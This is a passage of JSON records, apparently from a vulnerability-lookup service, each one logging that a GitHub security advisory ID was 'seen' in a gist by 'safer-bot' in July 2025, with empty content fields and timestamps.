"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/f2f0003a494ace0ad15363f44df8eb77", "content": "", "creation_timestamp": "2025-07-16T17:01:36.000000Z"}, {"uuid": "b67ae608-cc2a-46ca-9540-34b9cbab36c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/f2f0003a494ace0ad15363f44df8eb77", "content": "", "creation_timestamp": "2025-07-16T17:01:36.000000Z"}, {"uuid": "df7a05a8-93d7-473d-a819-a7894364195a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/f2f0003a494ace0ad15363f44df8eb77", "content": "", "creation_timestamp": "2025-07-16T17:01:36.000000Z"}, {"uuid": "4b5b3a70-0b25-4f27-8388-1a000ff93743", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/f2f0003a494ace0ad15363f44df8eb77", "content": "", "creation_timestamp": "2025-07-16T17:01:36.000000Z"}, {"uuid": "b15eb628-c0df-4f3d-bafa-5736292385f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rc2q-x9mf-w3vf", "type": "seen", "source": "https://gist.github.com/safer-bot/64bf736a1465988c38a404f957a9dd28", "content": "", "creation_timestamp": "2025-07-16T17:04:50.000000Z"}, {"uuid": "29d1e8fb-c1c9-468e-a643-51783c2fbbe7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vrpq-qp53-qv56", "type": "seen", "source": "https://gist.github.com/safer-bot/0bc03c6c37fe0eadd645198e5fc37290", "content": "", "creation_timestamp": "2025-07-16T17:08:34.000000Z"}, {"uuid": "68ed9913-c7b3-40e4-ba3c-3ae75589993f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/0bc03c6c37fe0eadd645198e5fc37290", "content": "", "creation_timestamp": "2025-07-16T17:08:34.000000Z"}, {"uuid": "79f5d7b6-fe10-4d5e-8dd7-14152c3efe2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/0bc03c6c37fe0eadd645198e5fc37290", "content": "", "creation_timestamp": "2025-07-16T17:08:34.000000Z"}, {"uuid": "a8d8628f-4315-4ac0-b367-8fa0e1641bf8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wxr5-93ph-8wr9", "type": "seen", "source": "https://gist.github.com/safer-bot/d03be7102396b6d210488e0de5fe0263", "content": "", "creation_timestamp": "2025-07-16T17:07:28.000000Z"}, {"uuid": "0573165a-9225-4d29-b0a4-97b1b1c26c72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6phf-73q6-gh87", "type": "seen", "source": "https://gist.github.com/safer-bot/d03be7102396b6d210488e0de5fe0263", "content": "", "creation_timestamp": "2025-07-16T17:07:28.000000Z"}, {"uuid": "cec8d697-49d4-4ebd-b590-186f59da0ae9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/d03be7102396b6d210488e0de5fe0263", "content": "", "creation_timestamp": "2025-07-16T17:07:28.000000Z"}, {"uuid": "1d12c449-11c4-47ec-b9af-a73332591313", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6hgm-866r-3cjv", "type": "seen", "source": "https://gist.github.com/safer-bot/d03be7102396b6d210488e0de5fe0263", "content": "", "creation_timestamp": "2025-07-16T17:07:28.000000Z"}, {"uuid": "556947e4-5d93-4bcd-85a9-ce5082bea83f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6c25-cxcc-pmc4", "type": "seen", "source": "https://gist.github.com/safer-bot/d03be7102396b6d210488e0de5fe0263", "content": "", "creation_timestamp": "2025-07-16T17:07:28.000000Z"}, {"uuid": "ff8d2023-90d9-4357-987e-a89d4d806bbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/d03be7102396b6d210488e0de5fe0263", "content": "", "creation_timestamp": "2025-07-16T17:07:28.000000Z"}, {"uuid": "56a34040-102d-49d7-9cd1-88407301686a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fjq5-5j5f-mvxh", "type": "seen", "source": "https://gist.github.com/safer-bot/d03be7102396b6d210488e0de5fe0263", "content": "", "creation_timestamp": "2025-07-16T17:07:28.000000Z"}, {"uuid": "d1c33943-a535-4b6d-8982-68333a6036db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p66x-2cv9-qq3v", "type": "seen", "source": "https://gist.github.com/safer-bot/d03be7102396b6d210488e0de5fe0263", "content": "", "creation_timestamp": "2025-07-16T17:07:28.000000Z"}, {"uuid": "f0415885-196a-42f7-b06b-50f4926a6ebc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/d03be7102396b6d210488e0de5fe0263", "content": "", "creation_timestamp": "2025-07-16T17:07:28.000000Z"}, {"uuid": "43e23a88-a858-4971-beb2-754e9824b802", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77h8-5j3h-jcjf", "type": "seen", "source": "https://gist.github.com/safer-bot/d03be7102396b6d210488e0de5fe0263", "content": "", "creation_timestamp": "2025-07-16T17:07:28.000000Z"}, {"uuid": "b2e4cb7d-a41a-4756-809e-d1bb245aeaaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/3552deb0e3e58000388a51849ac4a95b", "content": "", "creation_timestamp": "2025-07-16T17:09:41.000000Z"}, {"uuid": "dbcfb291-90fd-44ca-ba3c-7def7002e2c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h46c-h94j-95f3", "type": "seen", "source": "https://gist.github.com/safer-bot/3552deb0e3e58000388a51849ac4a95b", "content": "", "creation_timestamp": "2025-07-16T17:09:41.000000Z"}, {"uuid": "c06f8cc2-e4d1-47b0-b8fe-3015be1ff44a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/4dc1ecb9c56e3a6b3b01986d7ee10fa7", "content": "", "creation_timestamp": "2025-07-16T22:34:25.000000Z"}, {"uuid": "2ad41f7f-2a18-4862-9ffd-b6fa18ec6756", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/3e1782b423df5ab41a310b34480846d7", "content": "", "creation_timestamp": "2025-07-16T22:36:51.000000Z"}, {"uuid": "0b6872e2-d347-4766-9d91-73cc48f4b1cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/74b8195dac65f235d5718e846d575dde", "content": "", "creation_timestamp": "2025-07-16T22:35:47.000000Z"}, {"uuid": "fc6002e9-f806-442e-9089-8f1801510ce7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/74b8195dac65f235d5718e846d575dde", "content": "", "creation_timestamp": "2025-07-16T22:35:47.000000Z"}, {"uuid": "c4591ef5-7d2a-4a59-84e0-330079df7408", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/74b8195dac65f235d5718e846d575dde", "content": "", "creation_timestamp": "2025-07-16T22:35:47.000000Z"}, {"uuid": "bcf769fe-6700-4a73-a8ec-7131d282fd8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/829424a5bb86f230c23a7e542de57910", "content": "", "creation_timestamp": "2025-07-16T22:38:28.000000Z"}, {"uuid": "817ca2d3-8009-4e4b-93ef-ae52910d57ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/f3e5942415c51576f82943da8de7ed2f", "content": "", "creation_timestamp": "2025-07-16T22:37:56.000000Z"}, {"uuid": "869eb251-9baa-4805-a9fd-bb394b4c1109", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/1251368c776d609d09713b6a20341ecb", "content": "", "creation_timestamp": "2025-07-16T22:37:23.000000Z"}, {"uuid": "20d618b5-8364-433c-a70b-e9d45b3cde77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/515bc5e7c7e753d7e71ada3f86d68df5", "content": "", "creation_timestamp": "2025-07-16T22:40:03.000000Z"}, {"uuid": "ddaea879-9238-4f08-a849-7cbe448588cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/515bc5e7c7e753d7e71ada3f86d68df5", "content": "", "creation_timestamp": "2025-07-16T22:40:03.000000Z"}, {"uuid": "1d80efb3-c425-4530-b47a-0cd42c27dd79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/515bc5e7c7e753d7e71ada3f86d68df5", "content": "", "creation_timestamp": "2025-07-16T22:40:03.000000Z"}, {"uuid": "1bc66fad-7a46-4450-b3c4-3356bce3b3a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/515bc5e7c7e753d7e71ada3f86d68df5", "content": "", "creation_timestamp": "2025-07-16T22:40:03.000000Z"}, {"uuid": "50039fa4-3fe1-4c90-bae6-ebeb733135f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/8321a9e971bd372592fd4a21dcc1520b", "content": "", "creation_timestamp": "2025-07-16T22:40:41.000000Z"}, {"uuid": "7188a0b5-eed5-4399-b88d-ea5c129386af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/79dffbf4542506b77c4a3409527911f3", "content": "", "creation_timestamp": "2025-07-16T22:42:49.000000Z"}, {"uuid": "84217082-5aba-4135-a28e-dabb0598743e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/79dffbf4542506b77c4a3409527911f3", "content": "", "creation_timestamp": "2025-07-16T22:42:49.000000Z"}, {"uuid": "e847e27e-a567-41bc-bff7-452633ec0b2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/7a3bd463edb4c33b5bad0ba90c6fae4f", "content": "", "creation_timestamp": "2025-07-16T22:42:17.000000Z"}, {"uuid": "eb3492f8-d200-4a3a-a059-96e40030a702", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/7a3bd463edb4c33b5bad0ba90c6fae4f", "content": "", "creation_timestamp": "2025-07-16T22:42:17.000000Z"}, {"uuid": "9a1889a2-12b2-4d17-bc14-154f2367b937", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/7a3bd463edb4c33b5bad0ba90c6fae4f", "content": "", "creation_timestamp": "2025-07-16T22:42:17.000000Z"}, {"uuid": "897483d9-6682-40c4-94f9-6761a6785d31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h46c-h94j-95f3", "type": "seen", "source": "https://gist.github.com/safer-bot/7a3bd463edb4c33b5bad0ba90c6fae4f", "content": "", "creation_timestamp": "2025-07-16T22:42:17.000000Z"}, {"uuid": "9b4a1678-8239-41c0-87a7-04403f467b7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4h5-3hr4-j3g2", "type": "seen", "source": "https://gist.github.com/safer-bot/adb1870a7636fd49f966d4a5e42523aa", "content": "", "creation_timestamp": "2025-07-16T22:44:29.000000Z"}, {"uuid": "947b7754-1339-440d-ad56-2385304f2a20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gg5-vx3j-xwc7", "type": "seen", "source": "https://gist.github.com/safer-bot/adb1870a7636fd49f966d4a5e42523aa", "content": "", "creation_timestamp": "2025-07-16T22:44:29.000000Z"}, {"uuid": "e5c5a780-9981-4643-bcf4-c3546d60028c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/adb1870a7636fd49f966d4a5e42523aa", "content": "", "creation_timestamp": "2025-07-16T22:44:29.000000Z"}, {"uuid": "b08dcdfd-926b-4c0a-8372-ae126e14ea64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g5ww-5jh7-63cx", "type": "seen", "source": "https://gist.github.com/safer-bot/adb1870a7636fd49f966d4a5e42523aa", "content": "", "creation_timestamp": "2025-07-16T22:44:29.000000Z"}, {"uuid": "11120b0d-4aaf-4807-8ff5-a8a5e7382664", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m6vm-37g8-gqvh", "type": "seen", "source": "https://gist.github.com/safer-bot/b8f93ae831181ddcdc263bbd87da041c", "content": "", "creation_timestamp": "2025-07-16T22:46:40.000000Z"}, {"uuid": "42d0643a-8a6b-44ff-8f62-b032fea02f21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/b8f93ae831181ddcdc263bbd87da041c", "content": "", "creation_timestamp": "2025-07-16T22:46:40.000000Z"}, {"uuid": "76a474b1-2c80-41bd-8bcd-09412c82122c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gg5-vx3j-xwc7", "type": "seen", "source": "https://gist.github.com/safer-bot/b8f93ae831181ddcdc263bbd87da041c", "content": "", "creation_timestamp": "2025-07-16T22:46:40.000000Z"}, {"uuid": "5edb30ad-3468-4c82-bc17-aa09126197ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g5ww-5jh7-63cx", "type": "seen", "source": "https://gist.github.com/safer-bot/b8f93ae831181ddcdc263bbd87da041c", "content": "", "creation_timestamp": "2025-07-16T22:46:40.000000Z"}, {"uuid": "224920c9-26a0-468f-ab9b-bc3f53d41239", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24rp-q3w6-vc56", "type": "seen", "source": "https://gist.github.com/safer-bot/b8f93ae831181ddcdc263bbd87da041c", "content": "", "creation_timestamp": "2025-07-16T22:46:40.000000Z"}, {"uuid": "3c127b1b-6e31-4602-99b5-fd5b622825ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4h5-3hr4-j3g2", "type": "seen", "source": "https://gist.github.com/safer-bot/b8f93ae831181ddcdc263bbd87da041c", "content": "", "creation_timestamp": "2025-07-16T22:46:40.000000Z"}, {"uuid": "8802f15d-8428-4354-99f0-dd48dcd06d1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/b8f93ae831181ddcdc263bbd87da041c", "content": "", "creation_timestamp": "2025-07-16T22:46:40.000000Z"}, {"uuid": "3f9481f5-8c75-458f-8682-11521079d218", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hq9p-pm7w-8p54", "type": "seen", "source": "https://gist.github.com/safer-bot/b8f93ae831181ddcdc263bbd87da041c", "content": "", "creation_timestamp": "2025-07-16T22:46:40.000000Z"}, {"uuid": "d4fc133c-dc6b-46de-bb44-13904de9fefb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7v6m-28jr-rg84", "type": "seen", "source": "https://gist.github.com/safer-bot/5cb6cdcecb39df1920bcd36ae48b6919", "content": "", "creation_timestamp": "2025-07-16T22:46:07.000000Z"}, {"uuid": "215f10a4-cf77-407a-b784-081f0f089a36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m8p2-495h-ccmh", "type": "seen", "source": "https://gist.github.com/safer-bot/5cb6cdcecb39df1920bcd36ae48b6919", "content": "", "creation_timestamp": "2025-07-16T22:46:07.000000Z"}, {"uuid": "a0887cfb-e1b3-4958-8533-2654f19ea1fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x83m-pf6f-pf9g", "type": "seen", "source": "https://gist.github.com/safer-bot/5cb6cdcecb39df1920bcd36ae48b6919", "content": "", "creation_timestamp": "2025-07-16T22:46:07.000000Z"}, {"uuid": "74c87d1a-696c-46e7-b073-8242111a70c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rmrm-75hp-phr2", "type": "seen", "source": "https://gist.github.com/safer-bot/5cb6cdcecb39df1920bcd36ae48b6919", "content": "", "creation_timestamp": "2025-07-16T22:46:07.000000Z"}, {"uuid": "0018e956-8f8e-4621-b11b-3efee79fff4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-599f-7c49-w659", "type": "seen", "source": "https://gist.github.com/safer-bot/0f26fa73c68bc4ec66786551ad3f3abb", "content": "", "creation_timestamp": "2025-07-16T22:45:35.000000Z"}, {"uuid": "a525e54c-4804-4e5b-8c90-03fe9255f0bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/ca9df2a9dad554a8c86c417be4170ac2", "content": "", "creation_timestamp": "2025-07-16T22:50:27.000000Z"}, {"uuid": "5ea918d5-8bc7-459a-9c6f-f586d8d6975d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/ca9df2a9dad554a8c86c417be4170ac2", "content": "", "creation_timestamp": "2025-07-16T22:50:27.000000Z"}, {"uuid": "335418a2-0ee3-4132-8473-4a2aaf05dd91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gg5-vx3j-xwc7", "type": "seen", "source": "https://gist.github.com/safer-bot/ca9df2a9dad554a8c86c417be4170ac2", "content": "", "creation_timestamp": "2025-07-16T22:50:27.000000Z"}, {"uuid": "5c092936-31e1-4751-98dd-1339f6882937", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g5ww-5jh7-63cx", "type": "seen", "source": "https://gist.github.com/safer-bot/ca9df2a9dad554a8c86c417be4170ac2", "content": "", "creation_timestamp": "2025-07-16T22:50:27.000000Z"}, {"uuid": "8520c073-80f1-4381-850c-3e47679de148", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4h5-3hr4-j3g2", "type": "seen", "source": "https://gist.github.com/safer-bot/ca9df2a9dad554a8c86c417be4170ac2", "content": "", "creation_timestamp": "2025-07-16T22:50:27.000000Z"}, {"uuid": "b794ecf3-193f-4892-86dd-97ecf753c2c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/ca9df2a9dad554a8c86c417be4170ac2", "content": "", "creation_timestamp": "2025-07-16T22:50:27.000000Z"}, {"uuid": "b74d6af6-136c-4384-a30e-fe8d4bae7f3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m6vm-37g8-gqvh", "type": "seen", "source": "https://gist.github.com/safer-bot/3f871162e91737e322f64a6395750213", "content": "", "creation_timestamp": "2025-07-16T22:49:20.000000Z"}, {"uuid": "cae8e5cc-2d82-4d17-8248-764d17589730", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/3f871162e91737e322f64a6395750213", "content": "", "creation_timestamp": "2025-07-16T22:49:20.000000Z"}, {"uuid": "c7ca795c-e9d3-4fc1-9f04-35f9268c69c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gg5-vx3j-xwc7", "type": "seen", "source": "https://gist.github.com/safer-bot/3f871162e91737e322f64a6395750213", "content": "", "creation_timestamp": "2025-07-16T22:49:20.000000Z"}, {"uuid": "6d005a18-f881-40b1-83b8-6d2ffbc69898", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g5ww-5jh7-63cx", "type": "seen", "source": "https://gist.github.com/safer-bot/3f871162e91737e322f64a6395750213", "content": "", "creation_timestamp": "2025-07-16T22:49:20.000000Z"}, {"uuid": "30096e7d-19c1-4351-99bc-cd1cc49c206c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4h5-3hr4-j3g2", "type": "seen", "source": "https://gist.github.com/safer-bot/3f871162e91737e322f64a6395750213", "content": "", "creation_timestamp": "2025-07-16T22:49:20.000000Z"}, {"uuid": "d74af611-79b9-43b4-bd57-13b1b9cbe8b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hh26-6xwr-ggv7", "type": "seen", "source": "https://gist.github.com/safer-bot/e873943f641a72ee9bd71d49597e7bff", "content": "", "creation_timestamp": "2025-07-16T22:52:07.000000Z"}, {"uuid": "ceb6eec9-40aa-4e2c-907d-a7962fbbc99e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r4q3-7g4q-x89m", "type": "seen", "source": "https://gist.github.com/safer-bot/e873943f641a72ee9bd71d49597e7bff", "content": "", "creation_timestamp": "2025-07-16T22:52:07.000000Z"}, {"uuid": "6af60e7d-19ff-4684-9ad5-e1227410609d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22wj-vf5f-wrvj", "type": "seen", "source": "https://gist.github.com/safer-bot/3552deb0e3e58000388a51849ac4a95b", "content": "", "creation_timestamp": "2025-07-16T17:09:41.000000Z"}, {"uuid": "79d8508b-a8dc-45b5-a239-e17d8e6468b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rpj-hg47-cx62", "type": "seen", "source": 